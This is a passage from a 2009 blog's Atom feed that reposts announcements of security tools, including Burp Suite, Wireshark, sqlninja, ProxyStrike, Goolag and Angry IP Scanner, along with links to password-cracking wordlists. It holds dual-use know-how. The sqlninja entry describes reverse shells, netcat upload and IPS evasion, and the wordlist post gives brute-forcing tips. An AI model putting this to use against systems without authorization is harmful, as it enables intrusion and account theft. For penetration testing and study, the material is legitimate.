src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-1456876720820559637</id><published>2009-01-03T02:30:00.000-08:00</published><updated>2009-01-03T05:27:41.315-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Goolag - GUI Tool for Google Hacking</title><content type='html'>Goolag - GUI Tool for Google Hacking&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.cultdeadcow.com/"&gt;cDc (Cult of the Dead Cow) &lt;/a&gt;recently released a GUI driven tool for Google Hacking called &lt;a href="http://goolag.org/"&gt;Goolag&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Google Dorks have been around for several years and have been researched most assiduously by &lt;a href="http://johnny.ihackstuff.com/"&gt;Johnny I Hack Stuff.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;If one searches the Web, one will find multiple collections of dorks, and also some applications - standalone and Web-based - offering certain “scanning” possibilities.&lt;br /&gt;&lt;br /&gt;Nevertheless, gS is different from other applications released to date for the following reasons:&lt;br /&gt;&lt;br /&gt;    * There is no need for a special tool to use dorks other than a browser, but scanning hundreds of dorks ‘by hand’ is impossible.&lt;br /&gt;    * Goolag Scanner is focused on usability. It simplifies the use of myriad numbers of dorks to a few mouse clicks. No cryptic command line options and no knowledge of Google hacking are required to test one’s host.&lt;br /&gt;    * Goolag Scanner comes with its own dorks-database, but it is not limited to such.&lt;br /&gt;    * gS uses a very simple xml-document, which is readable and part of the distribution.&lt;br /&gt;&lt;br /&gt;This software requires Microsoft .NET Framework Version 2.0.&lt;br /&gt;&lt;br /&gt;You can download Goolag here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://goolag.org/download.html"&gt;Goolag (1.0.0.40)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://goolag.org/specifications.html"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-1456876720820559637?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/1456876720820559637/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/goolag-gui-tool-for-google-hacking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1456876720820559637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1456876720820559637'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/goolag-gui-tool-for-google-hacking.html' title='Goolag - GUI Tool for Google Hacking'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-5504863493710430699</id><published>2009-01-03T02:28:00.000-08:00</published><updated>2009-01-03T04:35:20.207-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Burp Suite v1.1 Available for Download</title><content type='html'>Burp Suite v1.1 Available for Download&lt;br /&gt;&lt;br /&gt;One of our favourite all time tools for attacking web applications has been updated! Burp Suite has now reached version 1.1! This is a major release - not a minor upgrade.&lt;br /&gt;&lt;br /&gt;Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, authentication, downstream proxies, logging, alerting and extensibility.&lt;br /&gt;&lt;br /&gt;Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.&lt;br /&gt;&lt;br /&gt;Key features unique to Burp Suite include:&lt;br /&gt;&lt;br /&gt;    * Ability to “passively” spider an application in a non-intrusive manner, with all requests originating from the user’s browser.&lt;br /&gt;    * One-click transfer of interesting requests between tools, e.g. from the Burp Proxy request history, or the Burp Spider results tree.&lt;br /&gt;    * Detailed analysis and rendering of requests and responses.&lt;br /&gt;    * Extensibility via the IBurpExtender interface, which allows third-party code to extend the functionality of Burp Suite. Data processed by one tool can be used in arbitrary ways to affect the behaviour and results of other tools.&lt;br /&gt;    * Centrally configured settings for downstream proxies, web and proxy authentication, and logging.&lt;br /&gt;    * Tools can run in a single tabbed window, or be detached in individual windows.&lt;br /&gt;    * All tool and suite configuration is optionally persistent across program loads.&lt;br /&gt;    * Runs in both Linux and Windows.&lt;br /&gt;&lt;br /&gt;New features in version 1.1 include:&lt;br /&gt;&lt;br /&gt;    * Improved analysis of HTTP requests and responses wherever they appear, with browser-quality HTML and media rendering.&lt;br /&gt;    * Burp Sequencer, a new tool for analysing session token randomness.&lt;br /&gt;    * Burp Decoder, a new tool for performing manual and intelligent decoding and encoding of application data.&lt;br /&gt;    * Burp Comparer, a new utility for performing a visual diff of any two data items.&lt;br /&gt;    * Support for custom client and server SSL certificates.&lt;br /&gt;    * Ability to follow 3xx redirects in Burp Intruder and Repeater attacks.&lt;br /&gt;    * Improved interception and match-and-replace rules in Burp Proxy.&lt;br /&gt;    * A “lean mode”, for users who prefer less functionality and a smaller resource footprint.&lt;br /&gt;&lt;br /&gt;You can download Burp Suite here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://portswigger.net/suite/burpsuite_v1.1.zip"&gt;burpsuite_v1.1.zip&lt;/a&gt;&lt;br /&gt;&lt;a href="http://portswigger.net/suite/burpsuite_v1.1.tar.gz"&gt;burpsuite_v1.1.tar.gz&lt;/a&gt;&lt;br /&gt;Or read more here.&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-5504863493710430699?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/5504863493710430699/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/burp-suite-v11-available-for-download.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5504863493710430699'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5504863493710430699'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/burp-suite-v11-available-for-download.html' title='Burp Suite v1.1 Available for Download'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-6626955867126139215</id><published>2009-01-03T02:25:00.000-08:00</published><updated>2009-01-03T05:28:52.286-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='wordlists'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><category scheme='http://www.blogger.com/atom/ns#' term='password cracking'/><title type='text'>Password Cracking Wordlists and Tools for Brute Forcing</title><content type='html'>Password Cracking Wordlists and Tools for Brute Forcing&lt;br /&gt;&lt;br /&gt;I quite often get people asking me where to get Wordlists, after all brute forcing and password cracking often relies on the quality of your word list.&lt;br /&gt;&lt;br /&gt;Do note there are also various tools to generate wordlists for brute forcing based on information gathered such as documents and web pages (such as Wyd - password profiling tool) These are useful resources that can add unique words that you might not have if your generic lists.&lt;br /&gt;&lt;br /&gt;Also add all the company related words you can and if possible use industry specific word lists (chemical names for a lab, medical terms for a hospital etc).&lt;br /&gt;&lt;br /&gt;And always brute force in the native language.&lt;br /&gt;&lt;br /&gt;You can find a &lt;a href="http://www.securiteam.com/tools/5ZP0N20GAW.html"&gt;simple wordlist generator in PERL here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Although old, one of the most complete wordlist sets is here (easily downloadable by FTP too):&lt;br /&gt;&lt;br /&gt;&lt;a href="ftp://ftp.ox.ac.uk/pub/wordlists/"&gt;Oxford Uni Wordlists&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There’s a good set of lists here including many european languages and topic specific lists:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://theargon.com/achilles/wordlists/"&gt;The Argon Wordlists&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Here we have 50,000 words, common login/passwords and African words (this used to be a great resource):&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.totse.com/en/hack/word_lists/index.html"&gt;Totse Word Lists&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;There’s a good French word list here with and without accents, also has some other languages including names:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.securinfos.info/wordlists_dictionnaires.php"&gt;Wordlists for bruteforce crackers&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;One of the most famous lists is still from Openwall (the home of John the Ripper) and now costs money for the full version:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.openwall.com/passwords/wordlists/"&gt;Openwall Wordlists Collection&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Some good lists here organized by topic:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.outpost9.com/files/WordLists.html"&gt;Outpost9 Word lists&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Packetstorm has some good topic based lists including sciences, religion, music, movies and common lists. &lt;a href="http://packetstormsecurity.org/Crackers/wordlists/"&gt;Packetstorm word lists&lt;/a&gt;&lt;br /&gt;You can also check out some default password lists &lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6626955867126139215?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6626955867126139215/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/password-cracking-wordlists-and-tools.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6626955867126139215'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6626955867126139215'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/password-cracking-wordlists-and-tools.html' title='Password Cracking Wordlists and Tools for Brute Forcing'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-4345035542000129212</id><published>2009-01-03T02:23:00.000-08:00</published><updated>2009-01-03T05:06:04.576-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sniffer'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Wireshark v1.0.0 Released - Cross Platform Graphical Packet Sniffer</title><content type='html'>Wireshark v1.0.0 Released - Cross Platform Graphical Packet Sniffer&lt;br /&gt;After nearly 10 years of developement Wireshark (formely known as Ethereal) has finally reached version 1!&lt;br /&gt;&lt;br /&gt;For those that don’t know, Wireshark is the world’s foremost network protocol analyzer, and is the de facto (and often de jure) standard across many industries and educational institutions.&lt;br /&gt;&lt;br /&gt;Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.&lt;br /&gt;&lt;br /&gt;Features&lt;br /&gt;&lt;br /&gt;Wireshark has a rich feature set which includes the following:&lt;br /&gt;&lt;br /&gt;    * Deep inspection of hundreds of protocols, with more being added all the time&lt;br /&gt;    * Live capture and offline analysis&lt;br /&gt;    * Standard three-pane packet browser&lt;br /&gt;    * Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others&lt;br /&gt;    * Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility&lt;br /&gt;    * The most powerful display filters in the industry&lt;br /&gt;    * Rich VoIP analysis&lt;br /&gt;    * Read/write many different capture file formats: tcpdump (libpcap), Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others&lt;br /&gt;    * Capture files compressed with gzip can be decompressed on the fly&lt;br /&gt;    * Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platfrom)&lt;br /&gt;    * Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2&lt;br /&gt;    * Coloring rules can be applied to the packet list for quick, intuitive analysis&lt;br /&gt;    * Output can be exported to XML, PostScript®, CSV, or plain text&lt;br /&gt;&lt;br /&gt;This is one tool EVERYONE involved in security or network administration should be familiar with.&lt;br /&gt;&lt;br /&gt;You can download Wireshark here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.wireshark.org/download.html"&gt;Wireshark v1.0.0&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://www.wireshark.org/"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-4345035542000129212?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/4345035542000129212/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/wireshark-v100-released-cross-platform.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4345035542000129212'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4345035542000129212'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/wireshark-v100-released-cross-platform.html' title='Wireshark v1.0.0 Released - Cross Platform Graphical Packet Sniffer'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-5640725790789365174</id><published>2009-01-03T02:22:00.000-08:00</published><updated>2009-01-03T04:37:18.426-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><category scheme='http://www.blogger.com/atom/ns#' term='proxy'/><title type='text'>ProxyStrike - Active Web Application Proxy</title><content type='html'>ProxyStrike - Active Web Application Proxy&lt;br /&gt;&lt;br /&gt;ProxyStrike is an active Web Application Proxy, is a tool designed to find vulnerabilities while browsing an application. It was created because the problems faced in the pentests of web applications that depends heavily on Javascript, not many web scanners did it good in this stage, so ProxyStrike was born.&lt;br /&gt;&lt;br /&gt;Right now it has available SQL injection and XSS modules. Both modules are designed to catch as many vulnerabilities as they can, it’s that why the SQL Injection module is a Python port of the great “SQLibf“.&lt;br /&gt;&lt;br /&gt;The process is very simple, ProxyStrike runs like a passive proxy listening in port 8008 by default, so you have to browse the desired web site setting your browser to use ProxyStrike as a proxy, and ProxyStrike will analyze all the paremeters in background mode. For the user is a passive proxy because you won’t see any different in the behaviour of the application, but in the background is very active.&lt;br /&gt;&lt;br /&gt;Features:&lt;br /&gt;&lt;br /&gt;    * HTTP request/response history&lt;br /&gt;    * Request parameter stats&lt;br /&gt;    * Request parameter values stats&lt;br /&gt;    * Request URL parameter signing and header field signing&lt;br /&gt;    * Use of an alternate proxy (tor for example)&lt;br /&gt;    * SQL attacks&lt;br /&gt;    * XSS attacks&lt;br /&gt;    * Export results to HTML or XML&lt;br /&gt;    * Console version (python proxystrike.py -c / proxystrike.exe -c)&lt;br /&gt;&lt;br /&gt;You can download ProxyStrike here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.edge-security.com/soft/proxystrike-v1.0.zip"&gt;ProxyStrike v1.0 (Windows) (26/03/2008)&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.edge-security.com/soft/proxystrike-v1.0.tar"&gt;ProxyStrike v1.0 (Linux/OSX) (26/03/2008)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://www.edge-security.com/proxystrike.php"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-5640725790789365174?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/5640725790789365174/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/proxystrike-active-web-application.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5640725790789365174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5640725790789365174'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/proxystrike-active-web-application.html' title='ProxyStrike - Active Web Application Proxy'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-8526701840214715182</id><published>2009-01-03T02:21:00.000-08:00</published><updated>2009-01-03T04:37:48.435-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='SQL'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>sqlninja 0.2.2 Released for Download - SQL Injection Tool</title><content type='html'>sqlninja 0.2.2 Released for Download - SQL Injection Tool&lt;br /&gt;&lt;br /&gt;Sqlninja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote shell on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.&lt;br /&gt;&lt;br /&gt;It is written in Perl, it is released under the GPLv2 and so far has been successfully tested on:&lt;br /&gt;&lt;br /&gt;    * Linux&lt;br /&gt;    * FreeBSD&lt;br /&gt;    * Mac OS X&lt;br /&gt;&lt;br /&gt;Features&lt;br /&gt;&lt;br /&gt;    * Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, authentication mode)&lt;br /&gt;    * Bruteforce of ’sa’ password, both dictionary-based and incremental&lt;br /&gt;    * Privilege escalation to ’sa’ if its password has been found&lt;br /&gt;    * Creation of a custom xp_cmdshell if the original one has been disabled&lt;br /&gt;    * Upload of netcat.exe (or any other executable) using only 100% ASCII GET/POST requests, so no need for FTP connections&lt;br /&gt;    * TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell&lt;br /&gt;    * Direct and reverse bindshell, both TCP and UDP&lt;br /&gt;    * DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames&lt;br /&gt;&lt;br /&gt;What’s new&lt;br /&gt;&lt;br /&gt;    * Evasion techniques, in order to obfuscate the injected code and confuse/bypass signature-based IPS and application firewalls&lt;br /&gt;    * A more sophisticated upload module&lt;br /&gt;    * A new ‘blind execution’ attack mode, useful to issue commands and performs diagnostics when other modes fail&lt;br /&gt;    * Automatic URL-encoding now is performed only on sqlninja generated SQL code, giving the user a more granular control on the exploit strings&lt;br /&gt;&lt;br /&gt;You can download Sqlninja 0.2.2 here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://downloads.sourceforge.net/sqlninja/sqlninja-0.2.2.tgz"&gt;sqlninja-0.2.2.tgz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://sqlninja.sourceforge.net/"&gt;here.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-8526701840214715182?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/8526701840214715182/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/sqlninja-022-released-for-download-sql.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/8526701840214715182'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/8526701840214715182'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/sqlninja-022-released-for-download-sql.html' title='sqlninja 0.2.2 Released for Download - SQL Injection Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-87926852274306750</id><published>2009-01-03T02:11:00.000-08:00</published><updated>2009-01-03T05:29:22.745-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IP'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><category scheme='http://www.blogger.com/atom/ns#' term='Scanner'/><title type='text'>Angry IP Scanner - Cross Platform Port Scanner</title><content type='html'>Angry IP Scanner - Cross Platform Port Scanner&lt;br /&gt;&lt;br /&gt;Angry IP scanner is a very fast IP address and port scanner.&lt;br /&gt;&lt;br /&gt;It can scan IP addresses in any range as well as any their ports. It is cross-platform and lightweight. Not requiring any installations, it can be freely copied and used anywhere.&lt;br /&gt;&lt;br /&gt;Angry IP scanner simply pings each IP address to check if it’s alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be extended with plugins.&lt;br /&gt;&lt;br /&gt;It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc.&lt;br /&gt;&lt;br /&gt;Scanning results can be saved to CSV, TXT, XML or IP-Port list files. With help of plugins, Angry IP Scanner can gather any information about scanned IPs. Anybody who can write Java code is able to write plugins and extend functionality of Angry IP Scanner.&lt;br /&gt;&lt;br /&gt;In order to increase scanning speed, it uses multithreaded approach: a separate scanning thread is created for each scanned IP address. It is also cross platform running on Windows, Linux &amp; Mac.&lt;br /&gt;&lt;br /&gt;You can download Angry IP Scanner version 3.0-beta3 below:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sourceforge.net/project/downloading.php?group_id=25534&amp;filename=ipscan-3.0-beta3.exe"&gt;Executable for Windows 2000/XP/Vista&lt;/a&gt;&lt;br /&gt;&lt;a href="http://sourceforge.net/project/downloading.php?group_id=25534&amp;filename=ipscan-linux-3.0-beta3.jar"&gt;Executable JAR for any distribution of Linux (32-bit)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://www.angryziber.com/w/Home"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-87926852274306750?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/87926852274306750/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/angry-ip-scanner-cross-platform-port.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/87926852274306750'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/87926852274306750'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/angry-ip-scanner-cross-platform-port.html' title='Angry IP Scanner - Cross Platform Port Scanner'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-4904450716588565339</id><published>2009-01-03T02:09:00.000-08:00</published><updated>2009-01-03T04:39:51.398-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='web application'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>HttpBee - Web Application Hacking Toolkit</title><content type='html'>HttpBee - Web Application Hacking Toolkit&lt;br /&gt;&lt;br /&gt;HttpBee is a swiss-army-knife tool for web application hacking. It is multi-threaded, embedded with scriptable engine and has both command-line and daemon mode (if executed in daemon mode, HttpBee can become an agent of a distributed framework).&lt;br /&gt;&lt;br /&gt;This is a tool for more advanced users and there isn’t much documentation so if anyone feels like writing a more comprehensive guide or tutorial, please do so!&lt;br /&gt;&lt;br /&gt;Installing&lt;br /&gt;&lt;br /&gt;You will need lua 5.1.x. Grab it at &lt;a href="http://www.lua.org/ftp/"&gt;http://www.lua.org/ftp/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;You will also need pcre library.&lt;br /&gt;&lt;br /&gt;There’s no ./configure script in HttpBee at the moment, so you will need to change Makefile directly before you build it. Look into CXXFLAGS and CFLAGS section. -DOS_X (or -DLINUX, or -DWINDOWS is basically a setting for your platform, plus, ajust the pathes).&lt;br /&gt;&lt;br /&gt;Using&lt;br /&gt;&lt;br /&gt;The folder ‘modules’ contains lua plugins that HttpBee uses to perform its assessment tasks. You can run HttpBee as ./httpbee -s path/to/modules/script.lua -t 255 -h localhost (specifying different number of parallel threads impacts performance)&lt;br /&gt;&lt;br /&gt;Scripting&lt;br /&gt;&lt;br /&gt;The way HttpBee’s scripting engine is implemented is relevant to HttpBee architecture itself. HttpBee maintains a pool of threads that it uses for parallel task execution. Therefore execution of HttpBee scripts is not linear. Instead, there are certain functions which are executed at certain steps of scanning process. The global scripting part is executed when the script is initially “scanned”, so HttpBee can pick up tags, description and other data from your script. init function will be executed only when your script is picked up and scheduled for execution (based on tags selection for example).&lt;br /&gt;&lt;br /&gt;You can download HttpBee here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://o0o.nu/httpbee/httpbee-1.0rc1.tgz"&gt;httpbee-1.0rc1.tgz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Or read more &lt;a href="http://o0o.nu/httpbee/"&gt;here.&lt;/a&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-4904450716588565339?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/4904450716588565339/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/httpbee-web-application-hacking-toolkit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4904450716588565339'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4904450716588565339'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/httpbee-web-application-hacking-toolkit.html' title='HttpBee - Web Application Hacking Toolkit'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 